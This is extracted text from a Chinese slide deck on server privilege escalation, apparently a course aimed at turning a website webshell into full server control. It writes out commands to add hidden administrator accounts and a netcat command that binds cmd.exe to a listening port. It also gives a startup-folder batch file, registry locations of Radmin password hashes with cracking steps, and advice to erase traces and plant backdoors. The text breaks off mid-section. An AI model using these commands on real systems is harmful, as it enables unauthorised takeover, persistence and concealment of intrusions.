6.服务器提权分解.pptxVIP

服务器提权 本课程主要讲解文件系统权限配置不当提权、第三方软件提权、数据 库提权、服务器远程溢出提权等。 了解提权攻击原理及提权方法 掌握相关的提权工具工具进行提权 提权后的操作 课程简介 ? 该权限允许用户查看该文件夹中的文件以及子文件夹，也允许查 看该文件夹的属性、所有者和拥有的权限等； 写入 ? 该权限允许用户在该文件夹中创建新的文件和子文件夹，也可以 改变文件夹的属性、查看文件夹的所有者和权限等。 执行 ? 该权限允许用户在该文件夹中执行任何脚本文件或者.exe可执行 文件，此权限如果设置不当，会对计算机的安全带来严重危害。 文件权限 读取 一、文件系统权限配置不当提权 二、第三方软件提权 三、数据库提权 四、服务器溢出提权 课程目录 ? 主要针对网站入侵过程中,当入侵某一网站时，通过各种漏洞提升 WEBSHELL权限，从而进一步获得服务器权限。 掌握相关的提权工具工具进行提权 ? ? ? ? 操作系统本身的提权 利用数控进行提权 系统配置不当提权 第三方软件提权 提权后的操作 ? ? ? 清理痕迹--隐藏攻击 安装后门--长久控制 渗透内网-扩大战果 基本概念 提权攻击原理及提权方法 一、文件权限配置不当提权 二、第三方软件提权 三、数据库提权 四、服务器溢出提权 课程目录 普通提权 直接执行开启3389端口、可以执行net user username password /add；net localgroup administrators username /add，如果cmd被禁用，可尝试自己上传 cmd.exe 7 文件权限配置不当提权 NC反弹提权 条件是你要有足够的运行权限 然后把它反弹到自己的电脑上，找个 可读可写的目录将nc.exe和cmd.exe上传上去。 然后到cmd命令执行 那栏里把cmd路径写上去，接着执行：C:\Inetpub\wwwroot\nc.exe - l -p 8888 -t -e C:\Inetpub\wwwroot\cmd.exe 执行完毕后打开我们的dos,执行：telnet 服务器IP 8888 说明：8888是我们监听的端口。接着tenter进入，这时就可以执行命 令添加系统账号进行终端登陆了，完毕。 注(如果在webshell中执行的命令不是管理权限，可以将执行的命令 包含下pr中) 8 文件权限配置不当提权 NC反弹提权 直接可把shell反弹到本机上 文件权限配置不当提权 启动项提权 写启动项提权： C:/Documents and Settings/All Users/「开始」 菜单/程序/启动 @echo off net user admin admin /add net localgroup administrators admin /add 保存bat文件 文件权限配置不当提权 一、文件权限配置不当提权 二、第三方软件提权 三、数据库提权 四、服务器溢出提权 课程目录 Radmin简介 Radmin (Remote Administrator)是一款屡获殊荣的远程控制软件，它将 远程控制、外包服务组件、以及网络监控结合到一个系统里，提供目 前为止最快速、强健而安全的远程管理服务工具包。 第三方软件提权 Radmin提权 Radmin默认端口是4899，先获取密码和端口，如下位置： HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Para meter //默认密码注册表位置 HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置 然后用HASH版连接,或者破解加密的hash值进行连接。 第三方软件提权 Radmin提权 读取Radmin的密码hash 破解Radmin密文 第三方软件提权 Radmin提权 使用Radmin工具进行连接 第三方软件提权 PcAnyWhere提权 PcAnyWhere是一款远程控制软件，你可以将你的电脑当成主控端去控 制远方另一台同样安装有PcAnyWhere的电脑（被控端），你可以使用 被控端电脑上的程序或在主控端与被控端之间互传文件。 第三方软件提权 PcAnyWhere提权 下载保存账号和密码的文件 第三方软件提权 PcAnyWhere提权 破解PcAnyWhere密文 第三方软件提权 PcAnyWhere提权 本地登陆远程计算机 第三方软件提权 Serv-u提权 Serv-U，是一种被广泛运用的FTP服务器端软件，可以设定多个FTP服 务器、限定登录用户的权限、登录主目录及空间大小等，功能非常完 备。它具有非常完备的安全特性，支持SSl